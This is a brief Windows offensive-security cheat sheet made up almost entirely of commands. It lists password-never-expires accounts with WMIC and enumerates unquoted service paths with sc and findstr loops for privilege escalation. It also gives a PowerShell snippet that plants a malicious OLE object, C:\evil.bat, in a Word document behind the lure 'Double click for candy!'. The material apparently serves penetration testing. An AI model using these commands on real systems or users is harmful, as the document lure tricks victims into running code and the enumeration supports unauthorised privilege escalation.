Windows

Find all AD accounts whose password is set to never expire:
wmic UserAccount where PasswordExpires=False get Name

Plant a malicious OLE into a Word document:
$word = New-Object -ComObject Word.Application
$word.visible = $true
$objDoc = $word.Documents.Add()
$objSelection = $word.Selection
$objSelection.TypeText("Double click for candy!")
$objSelection.InlineShapes.AddOLEObject('','C:\evil.bat',$false,$true,'C:\candy.ico')

Find unqouted service paths without access to wmic. Need to run both of these to catch services with spaces in their names:
for /f "tokens=2" %i in ('sc query ^|findstr "SERVICE_NAME"') do sc qc %i | findstr "BINARY_PATH_NAME" >> output.txt
for /f "tokens=2*" %i in ('sc query ^|findstr "SERVICE_NAME"') do sc qc "%i %j" | findstr "BINARY_PATH_NAME" >> output.txt